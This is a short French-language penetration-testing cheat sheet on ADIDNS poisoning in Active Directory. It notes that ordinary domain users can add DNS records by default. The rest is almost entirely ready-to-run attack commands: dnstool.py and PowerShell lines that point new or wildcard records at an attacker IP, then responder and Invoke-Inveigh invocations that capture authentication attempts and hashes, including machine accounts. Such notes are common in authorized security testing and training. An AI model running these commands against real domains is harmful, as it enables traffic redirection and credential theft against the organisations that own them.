ADIDNS

Poisoning

Par défaut, un utilisateur peut ajouter une entrée dans le serveur dns de l'AD et faire pointer ce sous domaine vers, par exemple, l'ip d'un poste attaquant. Il est ensuite possible d'utiliser un outil tel que responder pour éventuellement récupérer des tentatives de connexions (imaginons par exemple un script de monitoring sur les différentes entrées du domaine, un lecteur réseau qui n'est plus utilisé ou autre...).

Utilisation de dnstool (https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py)

Ajouter un enregistrement DNS (depuis linux):

dnstool.py -u 'DOMAIN\user' -p 'password' --record 'sousDomaine' --action add --data $AttackerIP $DomainController

Depuis Windows:

Set-ADIDNSNodeAttribute -Node sousDomaine -Attribute DNSRecord -Value (New-DNSRecordArray -Data $ATTACKER_IP) -Verbose

# Activer/désactiver un node:
Enable-ADIDNSNode -Node *
Disable-ADIDNSNode -Node *

Utilisation de responder:

sudo responder -I tun0 -d -D

Depuis Windows, il est possible d'automatiser le processus (Inveigh va checker si des appels DNS n'aboutissent à rien, si c'est le cas il va créer l'entrée DNS en question et la rediriger vers lui pour récupérer d'éventuelles informations):

Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts